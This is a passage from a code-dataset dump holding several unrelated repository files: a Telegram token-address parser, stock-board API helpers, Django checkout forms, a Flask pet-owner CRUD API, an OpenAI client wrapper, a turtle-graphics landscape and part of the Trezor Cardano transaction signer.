'dexscreener.com/bsc', 'dextools.io/app/bsc'],\n 'avax': ['dexscreener.com/avalanche', 'dextools.io/app/avalanche'],\n 'ftm': ['dexscreener.com/fantom', 'dextools.io/app/fantom'],\n 'poly': ['dexscreener.com/polygon', 'dextools.io/app/polygon']\n}\n\n#later: 'cronos': dexscreener.com/cronos/\n\nclass ParseResult:\n def __init__(self, addresses: List[str], chains: List[str]):\n self.addresses = addresses\n self.chains = chains\n\n\ndef parse_message(message_text) -> ParseResult:\n \"\"\"\n :param message_text:\n :return: ParseResult -> address of a token or Uniswap-like pair and the chain that its on. None if no\n address contained in message\n \"\"\"\n\n if message_text is None:\n return ParseResult([], [])\n\n found_addresses = compiled_re.findall(message_text)\n found_chains = []\n\n for chain_name, search_terms in CHAIN_SEARCH_TERMS.items():\n message_contains_any_searchterm = any(map(lambda x: x in message_text, search_terms))\n if message_contains_any_searchterm:\n found_chains.append(chain_name)\n\n return ParseResult(found_addresses, found_chains)\n","repo_name":"Minh-Trng/telegram-token-sniper","sub_path":"telegramtokensniper/parsing/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"23520239193","text":"import datetime\nimport logging\nimport re\nfrom typing import Any, List, Optional\n\nfrom coretypes import FrameType\nfrom omicron.extensions.decimals import math_round\nfrom omicron.models.board import Board\nfrom omicron.models.timeframe import TimeFrame\n\nfrom omega.boards.board import ConceptBoard, IndustryBoard\nfrom omega.boards.storage import calculate_ma_list, calculate_rsi_list\nfrom omega.webservice.stockinfo import GlobalStockInfo\n\nlogger = logging.getLogger(__name__)\n\n\ndef new_boards(days: int = 10):\n cb = ConceptBoard()\n cb.init()\n result = cb.find_new_concept_boards(days)\n if result is None or len(result) == 0:\n print(f\"近{days}天内没有新的概念板块\")\n else:\n print(result)\n\n\ndef latest_boards(n: int = 3):\n cb = ConceptBoard()\n cb.init()\n df = cb.find_latest_n_concept_boards(n)\n print(df)\n\n\ndef new_members(days: int = 10, prot: int = None):\n cb = ConceptBoard()\n cb.init()\n try:\n results = cb.new_members_in_board(days)\n if len(results) == 0:\n print(f\"近{days}天内没有板块有新增成员\")\n else:\n for board, stocks in results.items():\n print(cb.get_name(board) + \":\")\n aliases = [cb.get_stock_alias(stock) for stock in stocks]\n print(\" \".join(aliases))\n except Exception as e:\n print(e)\n\n\ndef combined_filter(\n industry: str = None, with_concepts: Optional[List[str]] = None, without=[]\n) -> List[str]:\n \"\"\"针对行业板块与概念板块的联合筛选\n\n Args:\n industry: 返回代码必须包含在这些行业板块内\n with_concepts: 返回代码必须包含在这些概念内\n without: 返回代码必须不在这些概念内\n\n Returns:\n 股票代码列表\n \"\"\"\n if with_concepts is not None:\n cb = ConceptBoard()\n cb.init()\n\n if isinstance(with_concepts, str):\n with_concepts = [with_concepts]\n\n if isinstance(without, str):\n without = [without]\n concepts_codes = set(cb.filter(with_concepts, without=without))\n else:\n concepts_codes = None\n\n codes = None\n if industry is not None:\n ib = IndustryBoard()\n ib.init()\n\n codes = ib.filter([industry])\n if codes is not None:\n codes = set(codes)\n else:\n codes = None\n\n final_results = []\n if codes is None or concepts_codes is None:\n final_results = codes or concepts_codes\n else:\n final_results = codes.intersection(concepts_codes)\n\n return final_results\n\n\ndef filter(industry=None, with_concepts: Optional[List[str]] = None, without=[]):\n if industry is not None and isinstance(industry, int):\n industry = str(industry)\n\n if with_concepts is not None and isinstance(with_concepts, list):\n with_concepts = [str(item) for item in with_concepts]\n elif isinstance(with_concepts, str):\n with_concepts = re.split(r\"[,,]\", with_concepts)\n\n if without is not None and isinstance(without, list):\n without = [str(item) for item in without]\n elif isinstance(without, str):\n without = re.split(r\"[,,]\", without)\n\n results = combined_filter(industry, with_concepts, without)\n\n if industry is None:\n board = IndustryBoard()\n board.init()\n else:\n board = ConceptBoard()\n board.init()\n\n for code in results:\n name = board.get_stock_alias(code)\n print(code, name)\n\n\ndef list_boards(sub: str):\n result = []\n\n if sub == \"concept\":\n cb = ConceptBoard()\n for i, (_, name, code, count) in enumerate(cb.boards):\n result.append((code, name, count.item()))\n elif sub == \"industry\":\n ib = IndustryBoard()\n for i, (name, code, count) in enumerate(ib.boards):\n result.append((code, name, count.item()))\n\n return result\n\n\ndef board_fuzzy_match(board_type: str, pattern: str):\n if board_type == \"industry\":\n handler = IndustryBoard()\n else:\n handler = ConceptBoard()\n\n codes = handler.fuzzy_match_board_name(pattern)\n if not codes:\n return []\n\n results = []\n for _item in codes:\n _name = handler.get_name(_item)\n if not _name:\n continue\n results.append(f\"{_item} {_name}\")\n\n return results\n\n\ndef get_board_info_by_id(board_type: str, board_id: str, _mode: int = 0):\n if board_type == \"industry\":\n handler = IndustryBoard()\n else:\n handler = ConceptBoard()\n\n _info = handler.get_board_info(board_id)\n if not _info:\n return {}\n\n if _mode == 0:\n return {\"code\": board_id, \"name\": _info[0], \"stocks\": _info[1].item()}\n\n _list = handler.get_members(board_id, with_name=True)\n if not _list:\n return {\"code\": board_id, \"name\": _info[0], \"stocks\": _info[1].item()}\n else:\n return {\"code\": board_id, \"name\": _info[0], \"stocks\": _list}\n\n\ndef get_boards_by_sec(board_type: str, security: str):\n if board_type == \"industry\":\n handler = IndustryBoard()\n else:\n handler = ConceptBoard()\n\n bl = handler.get_boards(security)\n if len(bl) == 0:\n return []\n\n result = []\n for board_id in bl:\n _info = handler.get_board_info(board_id)\n if not _info:\n continue\n result.append({\"code\": board_id, \"name\": _info[0], \"stocks\": _info[1].item()})\n\n return result\n\n\ndef board_filter_members(\n board_type: str, included: List[str], excluded: List[str] = []\n):\n if board_type == \"industry\":\n handler = IndustryBoard()\n else:\n handler = ConceptBoard()\n\n codes = handler.filter(included, without=excluded)\n if not codes:\n return []\n\n stock_list = []\n for _item in codes:\n _stock_name = GlobalStockInfo.get_stock_name(_item)\n if not _stock_name: # 退市或者北交所的股票忽略\n continue\n stock_list.append([_item, _stock_name])\n\n return stock_list\n\n\nasync def get_board_bars_bycount(board_id: str, dt_end: datetime.date, n_bars: int):\n now = datetime.datetime.now()\n if not TimeFrame.is_trade_day(now):\n dt = TimeFrame.day_shift(now, 0)\n else:\n dt = now.date()\n\n # 为了计算MA250,取250+60根\n _end = dt_end\n if _end > dt:\n _end = dt\n if n_bars >= 120: # 约定最大n_bars为250\n _start = TimeFrame.shift(_end, -310, FrameType.DAY)\n else:\n _start = TimeFrame.shift(_end, -n_bars - 30, FrameType.DAY)\n\n board_info = {}\n sec_data = await Board.get_bars_in_range(board_id, _start, _end)\n if len(sec_data) == 0:\n return board_info\n\n ma_list = await calculate_ma_list(sec_data, more_data=True)\n rsi_list = await calculate_rsi_list(sec_data)\n ma_list[\"rsi6\"] = rsi_list\n\n # 只取最后120个节点\n for _key in ma_list:\n _raw_data = ma_list[_key]\n _count = len(_raw_data)\n if _count > n_bars:\n ma_list[_key] = _raw_data[_count - n_bars :]\n\n k_bars = []\n for item in sec_data:\n _date = item[\"frame\"].item()\n _data = {\n \"frame\": _date.strftime(\"%Y-%m-%d %H:%M:%S\"),\n \"data\": [\n math_round(item[\"open\"].item(), 2),\n math_round(item[\"close\"].item(), 2),\n math_round(item[\"low\"].item(), 2),\n math_round(item[\"high\"].item(), 2),\n math_round(item[\"volume\"].item() / 100, 0),\n math_round(item[\"amount\"].item() / 10000, 0),\n ],\n }\n k_bars.append(_data)\n _count = len(k_bars)\n if _count > n_bars:\n board_info[\"bars\"] = k_bars[_count - n_bars :]\n else:\n board_info[\"bars\"] = k_bars\n board_info.update(ma_list)\n\n return board_info\n","repo_name":"zillionare/omega","sub_path":"omega/boards/webapi.py","file_name":"webapi.py","file_ext":"py","file_size_in_byte":7765,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"69799614200","text":"from django import forms\nfrom django.conf import settings\nfrom django.utils.translation import ugettext_lazy as _\nfrom oscar.apps.checkout.forms import ShippingAddressForm as OldShippingAddressForm\nfrom oscar.core.loading import get_model\n\nVOLGA_CITIES = [\n ('Волжский', 'Волжский'),\n ('Волгоград', 'Волгоград'),\n ('Средняя Ахтуба', 'Средняя Ахтуба'), \n ('Краснослободск', 'Краснослободск'),\n]\n\nclass ShippingAddressForm(OldShippingAddressForm):\n\n class Meta: \n model = get_model('order', 'shippingaddress')\n fields = [\n 'first_name', 'last_name', #'title',\n 'line1', 'line2', #'line3', #'line4',\n 'state', \n 'postcode', 'country',\n 'phone_number', 'notes',\n ]\n labels = {\n 'first_name': 'Имя и Отчество (при наличии)',\n 'state': 'Город',\n # 'title': 'Отчество (при наличии)',\n # 'line1': 'Отчество (при наличии)',\n # 'line2': 'Первая строка адреса', \n # 'line3': 'Вторая строка адреса', \n }\n widgets = {\n 'state': forms.Select(choices=VOLGA_CITIES),\n 'title': forms.TextInput(attrs={'maxlength':50}),\n }\n\n\nclass PaymentMethodForm(forms.Form):\n \"\"\"\n Extra form for the custom payment method.\n \"\"\"\n payment_method = forms.ChoiceField(\n label=_(\"Выберите способ оплаты\"),\n choices=settings.OSCAR_PAYMENT_METHODS,\n widget=forms.RadioSelect()\n )\n\n\n def get_payment_method_display(payment_method):\n return dict(settings.OSCAR_PAYMENT_METHODS).get(payment_method)","repo_name":"eximius8/vlzb","sub_path":"myapps/checkout/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30273182909","text":"\"\"\"\nThis module takes care of starting the API Server, Loading the DB and Adding the endpoints\n\"\"\"\nfrom flask import Flask, request, jsonify, url_for, Blueprint\nfrom api.models import db, Owner, Dogs, Breeds, Playdates, Message\nfrom api.utils import generate_sitemap, APIException\n\napi = Blueprint('api', __name__)\n\n\n@api.route('/owner', methods=['POST'])\ndef handle_owner():\n request_body = request.get_json()\n # owner=Owner.query.get(request_body['name'])\n new_owner=Owner(\n name=request_body['name'],\n img_url = request_body['img_url'],\n zipcode = request_body['zipcode'],\n email = request_body['email'],\n password = request_body['password'],)\n db.session.add(new_owner)\n db.session.commit()\n return jsonify(new_owner.serialize()), 200\n@api.route('/owner/', methods=['GET'])\ndef get_owner(owner_id):\n owner = Owner.query.get(owner_id)\n if owner is None:\n return jsonify({'message': 'Owner not found'}), 404\n return jsonify(owner.serialize()), 200\n\n@api.route('/owners', methods=['GET'])\ndef get_all_owner():\n owner_list = Owner.query.all()\n owner_serialized = [owner.serialize() for owner in owner_list]\n if owner_list is None:\n return jsonify({'message': 'Owner not found'}), 404\n return jsonify(owner_serialized), 200\n\n@api.route('/owner/', methods=['PUT'])\ndef update_owner(owner_id):\n owner = Owner.query.get(owner_id)\n if owner is None:\n return jsonify({'message': 'Owner not found'}), 404\n request_body = request.get_json()\n owner.name = request_body.get('name', owner.name)\n owner.img_url = request_body.get('img_url', owner.img_url)\n owner.zipcode = request_body.get('zipcode', owner.zipcode)\n owner.email = request_body.get('email', owner.email)\n owner.password = request_body.get('password', owner.password)\n db.session.commit()\n return jsonify(owner.serialize()), 200\n \n@api.route('/owner/', methods=['DELETE'])\ndef delete_owner(id):\n owner = Owner.query.get(id)\n if owner is None:\n raise APIException(\"Owner not found\", 404)\n db.session.delete(owner)\n db.session.commit()\n return jsonify({'message': f'Owner{owner.id} was deleted'}), 201\n \n\n# DOGS LINE START HERE\n@api.route('/dogs', methods=['POST'])\ndef handle_dogs():\n request_body = request.get_json()\n new_dog=Dog(\n name=request_body['name'],\n img_url=request_body['img_url'],\n breed=request_body['breed'],\n chip_number=request_body['chip_number'],\n weight=request_body['weight'],\n neutered_or_spayed=request_body['neutered_or_spayed'],\n dog_id=request_body['dog_id'],)\n db.session.add(new_dog)\n db.session.commit()\n return jsonify(new_dog.serialize()), 200\n\n@api.route('/dogs', methods=['GET'])\ndef get_all_dogs():\n dogs_list = Dogs.query.all()\n dogs_serialized = [dogs.serialize() for dogs in dogs_list]\n if dogs_list is None:\n return jsonify({'message': 'Dogs not found'}), 404\n return jsonify(dogs_serialized), 200\n\n@api.route('/dogs/', methods=['GET'])\ndef get_dog(dog_id):\n dog = Dog.query.get(dog_id)\n if dog is None:\n return jsonify({'message': 'Dog not found'}), 404\n return jsonify(dog.serialize()), 200\n\n@api.route('/dogs/', methods=['PUT'])\ndef update_dog(dog_id):\n dog = Dogs.query.get(dog_id)\n if dog is None:\n return jsonify({'message': 'Dog not found'}), 404\n request_body = request.get_json()\n dog.name = request_body.get('name', dog.name)\n dog.img_url = request_body.get('img_url', dog.img_url)\n dog.zipcode = request_body.get('zipcode', dog.zipcode)\n dog.email = request_body.get('email', dog.email)\n dog.password = request_body.get('password', dog.password)\n db.session.commit()\n return jsonify(dog.serialize()), 200\n \n@api.route('/dogs/', methods=['DELETE'])\ndef delete_dog(id):\n dog = Dogs.query.get(id)\n if dog is None:\n raise APIException(\"Dog not found\", 404)\n db.session.delete(dog)\n db.session.commit()\n return jsonify({'message': f'Dogs{dog.id} was deleted'}), 201\n\n# BREEDS LINE START HERE\n@api.route('/breeds', methods=['POST'])\ndef handle_breeds():\n request_body = request.get_json()\n # owner=Owner.query.get(request_body['name'])\n new_breeds=Breeds(\n name=request_body['name'],\n img_url = request_body['img_url'],\n zipcode = request_body['zipcode'],\n email = request_body['email'],\n password = request_body['password'],)\n db.session.add(new_breeds)\n db.session.commit()\n return jsonify(new_breeds.serialize()), 200\n\n@api.route('/breeds/', methods=['GET'])\ndef get_breeds(breeds_id):\n breeds = breeds.query.get(breeds_id)\n if breeds is None:\n return jsonify({'message': 'Breeds not found'}), 404\n return jsonify(breeds.serialize()), 200\n\n@api.route('/breeds/', methods=['PUT'])\ndef update_breeds(breeds_id):\n breeds = Breeds.query.get(breeds_id)\n if breeds is None:\n return jsonify({'message': 'Breeds not found'}), 404\n request_body = request.get_json()\n breeds.name = request_body.get('name', breeds.name)\n breeds.img_url = request_body.get('img_url', breeds.img_url)\n breeds.zipcode = request_body.get('zipcode', breeds.zipcode)\n breeds.email = request_body.get('email', breeds.email)\n db.session.commit()\n return jsonify(breeds.serialize()), 200\n \n@api.route('/breeds/', methods=['DELETE'])\ndef delete_breeds(id):\n breeds = Breeds.query.get(id)\n if breeds is None:\n raise APIException(\"Breeds not found\", 404)\n db.session.delete(breeds)\n db.session.commit()\n return jsonify({'message': f'breeds{breeds.id} was deleted'}), 201\n\n# PLAYDATES LINE START HERE\n@api.route('/playdates' , methods=['POST'])\ndef Playdates():\n request_body = request.get_json()\n # owner=Owner.query.get(request_body['name'])\n new_playdate=Playdates(\n owner1_id=request_body['owner1_id'],\n owner2_id = request_body['owner2_id'],\n messages = request_body['messages'],)\n db.session.add(new_playdate)\n db.session.commit()\n return jsonify(new_playdate.serialize()), 200\n\n@api.route('/playdates/' , methods=['GET'])\ndef get_playdates(playdates_id):\n playdates = playdates.query.get(playdates_id)\n if playdates is None:\n return jsonify({'message': 'playdates not found'}), 404\n return jsonify(playdates.serialize()), 200\n\n\n@api.route('/playdates/', methods=['PUT'])\ndef update_playdates_id(playdates_id):\n playdates_id = playdates_id.query.get(playdates_id)\n if playdates_id is None:\n return jsonify({'message': 'playdates_id not found'}), 404\n request_body = request.get_json()\n new_playdate=Playdates(\n owner1_id=request_body['owner1_id'],\n owner2_id = request_body['owner2_id'],\n messages = request_body['messages'],)\n db.session.add(new_playdate)\n db.session.commit()\n return jsonify(playdates_id.serialize()), 200\n\n@api.route('playdates/', methods=['DELETE'])\ndef delete_playdates(id):\n playdates = playdates.query.get(id)\n if playdates is None:\n raise APIException(\"playdates not found\", 404)\n db.session.delete(playdates)\n db.session.commit()\n return jsonify({'message': f'playdates{playdates.id} was deleted'}), 201","repo_name":"OVYEDDeno/barkpals","sub_path":"src/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":7426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7745484699","text":"import openai\nfrom bytedance import servicediscovery\nimport random\n\n\nclass APIWrapper:\n def __init__(self, PSM=\"P.S.M\", DC=None) -> None:\n self.PSM = PSM\n if DC is not None:\n self.PSM += f\".service.{DC}\"\n\n def get_api_base(self):\n instances = servicediscovery.lookup(self.PSM)\n weighted_instances = []\n for instance in instances:\n weight = int(instance['Tags'].get('weight', 1))\n weighted_instances.extend([instance] * weight)\n instance = random.choice(weighted_instances)\n return f\"http://{instance['Host']}:{instance['Port']}/v1\"\n\n def __str__(self):\n return self.get_api_base()\n\n\ndef hook_openai(PSM=\"yangxinyu.715.infer\", DC=\"lq\"):\n import openai\n openai.api_base = APIWrapper(PSM=PSM, DC=DC)\n openai.api_key = \"---\"\n\n\nhook_openai()\nmodel = \"baichuan-7b\"\n\n\ndef test_completion(prompt=\"Once upon a time,\"):\n completion = openai.Completion.create(model=model, prompt=prompt, max_tokens=64)\n print(prompt + completion.choices[0].text)\n\n\ndef test_embedding():\n embedding = openai.Embedding.create(model=model, input=\"Hello world!\")\n print(len(embedding[\"data\"][0][\"embedding\"]))\n\n\nif __name__ == \"__main__\":\n test_completion()\n test_embedding()","repo_name":"tzh476/transformer_demo","sub_path":"baichuan.py","file_name":"baichuan.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36821466054","text":"import turtle\r\nimport random\r\nimport Shapes as shapes\r\nimport Formations as nature\r\nimport Backdrop as backing\r\nfrom House import house\r\nfrom Gradient import gradient\r\n\r\nframe_width = int(800)\r\nframe_height = int(500)\r\nground_width = 100\r\n\r\nturtle.setup(frame_width, frame_height, 250, 50)\r\n\r\nturtle.speed(0)\r\n# Background\r\nturtle.penup()\r\n\r\nturtle.setposition(-frame_width/2, (-frame_height/2)) # Backdrop\r\nshapes.rect(frame_width, frame_height, '110, 160, 230', 180)\r\nturtle.setposition(0, 0)\r\nturtle.penup()\r\n\r\nbacking.back_mount(frame_width, frame_height/1.75, frame_height, '165, 120, 230') # Hills\r\nbacking.back_mount(frame_width, frame_height/2.2, frame_height, '151, 90, 236')\r\nbacking.back_mount(frame_width, frame_height/2.75, frame_height, '137, 60, 242')\r\nbacking.back_mount(frame_width, frame_height/3.2, frame_height, '123, 30, 248')\r\nbacking.back_mount(frame_width, frame_height/3.5, frame_height, '110, 0, 255')\r\n\r\nturtle.setposition(frame_width/2, -frame_height/2) # Grass\r\ngradient(ground_width, frame_height*2, '67, 255, 49', '67, 155, 49', 90)\r\n# shapes.rect(frame_width, ground_width, '67, 255, 49', 180)\r\n\r\nturtle.setposition(0, 0)\r\n\r\nturtle.setposition(150, -150)\r\nnature.mountain(150, 150, 0, 3)\r\n\r\nturtle.setposition(-150, -150)\r\nnature.mountain(200, 200, 0, 2)\r\n\r\nturtle.setposition(0, -150)\r\nnature.mountain(350, 300, 0, 1)\r\n\r\nturtle.setheading(180)\r\nturtle.forward(300)\r\nturtle.setheading(270)\r\nturtle.forward(220)\r\n\r\nhouse(70, 60, 'brown', 0)\r\n\r\nturtle.setheading(0)\r\nturtle.forward(150)\r\n\r\nnature.tree(40, 30, 60, 80, 3, 30)\r\n\r\nturtle.setheading(270)\r\nturtle.forward(130)\r\nturtle.setheading(0 - 3)\r\nturtle.forward(150)\r\nnature.tree(40, 30, 60, 80, 3, 30)\r\n\r\nturtle.setheading(270)\r\nturtle.forward(130)\r\nturtle.setheading(0 + 7)\r\nturtle.forward(150)\r\nnature.tree(40, 30, 60, 80, 3, 30)\r\n\r\nturtle.setheading(270)\r\nturtle.forward(130)\r\nturtle.setheading(0 - 2)\r\nturtle.forward(150)\r\nnature.tree(40, 30, 60, 80, 3, 30)\r\n\r\n\r\n\"\"\"\r\nfor x in range(10):\r\n turtle.setposition(random.randint(-frame_width/2, frame_width/2), random.randint(-frame_height/2 + 100, frame_height/2))\r\n snowflake(3, 2, 'white')\r\n \r\n \"\"\"\r\n\r\nturtle.hideturtle()\r\nturtle.mainloop()","repo_name":"Ethan-Leone-9134/pythonProjects","sub_path":"turtleStuff/landscapes/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"36036454110","text":"from micropython import const\nfrom typing import TYPE_CHECKING\n\nfrom trezor import messages\nfrom trezor.enums import (\n CardanoCertificateType,\n CardanoTxOutputSerializationFormat,\n CardanoTxWitnessType,\n)\nfrom trezor.messages import CardanoTxItemAck, CardanoTxOutput\nfrom trezor.wire import DataError, ProcessError\nfrom trezor.wire.context import call as ctx_call\n\nfrom apps.common import safety_checks\n\nfrom .. import addresses, certificates, layout, seed\nfrom ..helpers import INPUT_PREV_HASH_SIZE, LOVELACE_MAX_SUPPLY\nfrom ..helpers.credential import Credential\nfrom ..helpers.hash_builder_collection import HashBuilderDict, HashBuilderList\nfrom ..helpers.paths import SCHEMA_STAKING\nfrom ..helpers.utils import derive_public_key\n\nif TYPE_CHECKING:\n from typing import Any, Awaitable, ClassVar\n\n from trezor.enums import CardanoAddressType\n\n from apps.common import cbor\n from apps.common.paths import PathSchema\n\n from ..helpers.hash_builder_collection import HashBuilderEmbeddedCBOR\n\n CardanoTxResponseType = CardanoTxItemAck | messages.CardanoTxWitnessResponse\n\n_MINTING_POLICY_ID_LENGTH = const(28)\n_MAX_ASSET_NAME_LENGTH = const(32)\n\n_TX_BODY_KEY_INPUTS = const(0)\n_TX_BODY_KEY_OUTPUTS = const(1)\n_TX_BODY_KEY_FEE = const(2)\n_TX_BODY_KEY_TTL = const(3)\n_TX_BODY_KEY_CERTIFICATES = const(4)\n_TX_BODY_KEY_WITHDRAWALS = const(5)\n_TX_BODY_KEY_AUXILIARY_DATA = const(7)\n_TX_BODY_KEY_VALIDITY_INTERVAL_START = const(8)\n_TX_BODY_KEY_MINT = const(9)\n_TX_BODY_KEY_SCRIPT_DATA_HASH = const(11)\n_TX_BODY_KEY_COLLATERAL_INPUTS = const(13)\n_TX_BODY_KEY_REQUIRED_SIGNERS = const(14)\n_TX_BODY_KEY_NETWORK_ID = const(15)\n_TX_BODY_KEY_COLLATERAL_RETURN = const(16)\n_TX_BODY_KEY_TOTAL_COLLATERAL = const(17)\n_TX_BODY_KEY_REFERENCE_INPUTS = const(18)\n\n_BABBAGE_OUTPUT_KEY_ADDRESS = const(0)\n_BABBAGE_OUTPUT_KEY_AMOUNT = const(1)\n_BABBAGE_OUTPUT_KEY_DATUM_OPTION = const(2)\n_BABBAGE_OUTPUT_KEY_REFERENCE_SCRIPT = const(3)\n\n_DATUM_OPTION_KEY_HASH = const(0)\n_DATUM_OPTION_KEY_INLINE = const(1)\n\n_POOL_REGISTRATION_CERTIFICATE_ITEMS_COUNT = const(10)\n\n_MAX_CHUNK_SIZE = const(1024)\n\n\nclass Signer:\n \"\"\"\n This class encapsulates the entire tx signing process. By default, most tx items are\n allowed and shown to the user. For each signing mode, there is a subclass that\n overrides some methods, usually to add more validation rules and show/hide some\n items. Each tx item is processed in a _process_xyz() method which handles validation,\n user confirmation and serialization of the tx item.\n \"\"\"\n\n SIGNING_MODE_TITLE: ClassVar[str]\n\n def __init__(\n self,\n msg: messages.CardanoSignTxInit,\n keychain: seed.Keychain,\n ) -> None:\n from ..helpers.account_path_check import AccountPathChecker\n\n self.msg = msg\n self.keychain = keychain\n\n self.account_path_checker = AccountPathChecker()\n\n # There should be at most one pool owner given as a path.\n self.pool_owner_path = None\n\n # Inputs, outputs and fee are mandatory, count the number of optional fields present.\n tx_dict_items_count = 3 + sum(\n (\n msg.ttl is not None,\n msg.certificates_count > 0,\n msg.withdrawals_count > 0,\n msg.has_auxiliary_data,\n msg.validity_interval_start is not None,\n msg.minting_asset_groups_count > 0,\n msg.include_network_id,\n msg.script_data_hash is not None,\n msg.collateral_inputs_count > 0,\n msg.required_signers_count > 0,\n msg.has_collateral_return,\n msg.total_collateral is not None,\n msg.reference_inputs_count > 0,\n )\n )\n self.tx_dict: HashBuilderDict[int, Any] = HashBuilderDict(\n tx_dict_items_count, ProcessError(\"Invalid tx signing request\")\n )\n\n self.should_show_details = False\n\n async def sign(self) -> None:\n from trezor.crypto import hashlib\n\n hash_fn = hashlib.blake2b(outlen=32)\n self.tx_dict.start(hash_fn)\n with self.tx_dict:\n await self._processs_tx_init()\n\n tx_hash = hash_fn.digest()\n await self._confirm_tx(tx_hash)\n\n response_after_witness_requests = await self._process_witness_requests(tx_hash)\n await ctx_call(response_after_witness_requests, messages.CardanoTxHostAck)\n await ctx_call(\n messages.CardanoTxBodyHash(tx_hash=tx_hash), messages.CardanoTxHostAck\n )\n\n # signing request\n\n async def _processs_tx_init(self) -> None:\n self._validate_tx_init()\n await self._show_tx_init()\n msg = self.msg # local_cache_attribute\n add = self.tx_dict.add # local_cache_attribute\n HBL = HashBuilderList # local_cache_global\n\n inputs_list: HashBuilderList[tuple[bytes, int]] = HBL(msg.inputs_count)\n with add(_TX_BODY_KEY_INPUTS, inputs_list):\n await self._process_inputs(inputs_list)\n\n outputs_list: HashBuilderList = HBL(msg.outputs_count)\n with add(_TX_BODY_KEY_OUTPUTS, outputs_list):\n await self._process_outputs(outputs_list)\n\n add(_TX_BODY_KEY_FEE, msg.fee)\n\n if msg.ttl is not None:\n add(_TX_BODY_KEY_TTL, msg.ttl)\n\n if msg.certificates_count > 0:\n certificates_list: HashBuilderList = HBL(msg.certificates_count)\n with add(_TX_BODY_KEY_CERTIFICATES, certificates_list):\n await self._process_certificates(certificates_list)\n\n if msg.withdrawals_count > 0:\n withdrawals_dict: HashBuilderDict[bytes, int] = HashBuilderDict(\n msg.withdrawals_count, ProcessError(\"Invalid withdrawal\")\n )\n with add(_TX_BODY_KEY_WITHDRAWALS, withdrawals_dict):\n await self._process_withdrawals(withdrawals_dict)\n\n if msg.has_auxiliary_data:\n await self._process_auxiliary_data()\n\n if msg.validity_interval_start is not None:\n add(_TX_BODY_KEY_VALIDITY_INTERVAL_START, msg.validity_interval_start)\n\n if msg.minting_asset_groups_count > 0:\n minting_dict: HashBuilderDict[bytes, HashBuilderDict] = HashBuilderDict(\n msg.minting_asset_groups_count,\n ProcessError(\"Invalid mint token bundle\"),\n )\n with add(_TX_BODY_KEY_MINT, minting_dict):\n await self._process_minting(minting_dict)\n\n if msg.script_data_hash is not None:\n await self._process_script_data_hash()\n\n if msg.collateral_inputs_count > 0:\n collateral_inputs_list: HashBuilderList[tuple[bytes, int]] = HBL(\n msg.collateral_inputs_count\n )\n with add(_TX_BODY_KEY_COLLATERAL_INPUTS, collateral_inputs_list):\n await self._process_collateral_inputs(collateral_inputs_list)\n\n if msg.required_signers_count > 0:\n required_signers_list: HashBuilderList[bytes] = HBL(\n msg.required_signers_count\n )\n with add(_TX_BODY_KEY_REQUIRED_SIGNERS, required_signers_list):\n await self._process_required_signers(required_signers_list)\n\n if msg.include_network_id:\n add(_TX_BODY_KEY_NETWORK_ID, msg.network_id)\n\n if msg.has_collateral_return:\n await self._process_collateral_return()\n\n if msg.total_collateral is not None:\n add(_TX_BODY_KEY_TOTAL_COLLATERAL, msg.total_collateral)\n\n if msg.reference_inputs_count > 0:\n reference_inputs_list: HashBuilderList[tuple[bytes, int]] = HBL(\n msg.reference_inputs_count\n )\n with add(_TX_BODY_KEY_REFERENCE_INPUTS, reference_inputs_list):\n await self._process_reference_inputs(reference_inputs_list)\n\n def _validate_tx_init(self) -> None:\n from ..helpers.utils import validate_network_info\n\n msg = self.msg # local_cache_attribute\n\n if msg.fee > LOVELACE_MAX_SUPPLY:\n raise ProcessError(\"Fee is out of range!\")\n if (\n msg.total_collateral is not None\n and msg.total_collateral > LOVELACE_MAX_SUPPLY\n ):\n raise ProcessError(\"Total collateral is out of range!\")\n validate_network_info(msg.network_id, msg.protocol_magic)\n\n async def _show_tx_init(self) -> None:\n self.should_show_details = await layout.show_tx_init(self.SIGNING_MODE_TITLE)\n\n if not self._is_network_id_verifiable():\n await layout.warn_tx_network_unverifiable()\n\n async def _confirm_tx(self, tx_hash: bytes) -> None:\n # Final signing confirmation is handled separately in each signing mode.\n raise NotImplementedError\n\n # inputs\n\n async def _process_inputs(\n self, inputs_list: HashBuilderList[tuple[bytes, int]]\n ) -> None:\n for _ in range(self.msg.inputs_count):\n input: messages.CardanoTxInput = await ctx_call(\n CardanoTxItemAck(), messages.CardanoTxInput\n )\n self._validate_input(input)\n await self._show_input(input)\n inputs_list.append((input.prev_hash, input.prev_index))\n\n def _validate_input(self, input: messages.CardanoTxInput) -> None:\n if len(input.prev_hash) != INPUT_PREV_HASH_SIZE:\n raise ProcessError(\"Invalid input\")\n\n async def _show_input(self, input: messages.CardanoTxInput) -> None:\n # We never show the inputs, except for Plutus txs.\n pass\n\n # outputs\n\n async def _process_outputs(self, outputs_list: HashBuilderList) -> None:\n total_amount = 0\n for _ in range(self.msg.outputs_count):\n output: CardanoTxOutput = await ctx_call(\n CardanoTxItemAck(), CardanoTxOutput\n )\n await self._process_output(outputs_list, output)\n\n total_amount += output.amount\n\n if total_amount > LOVELACE_MAX_SUPPLY:\n raise ProcessError(\"Total transaction amount is out of range!\")\n\n async def _process_output(\n self, outputs_list: HashBuilderList, output: CardanoTxOutput\n ) -> None:\n self._validate_output(output)\n should_show = self._should_show_output(output)\n if should_show:\n await self._show_output_init(output)\n\n output_items_count = 2 + sum(\n (\n output.datum_hash is not None,\n output.inline_datum_size > 0,\n output.reference_script_size > 0,\n )\n )\n if output.format == CardanoTxOutputSerializationFormat.ARRAY_LEGACY:\n output_list: HashBuilderList = HashBuilderList(output_items_count)\n with outputs_list.append(output_list):\n await self._process_legacy_output(output_list, output, should_show)\n elif output.format == 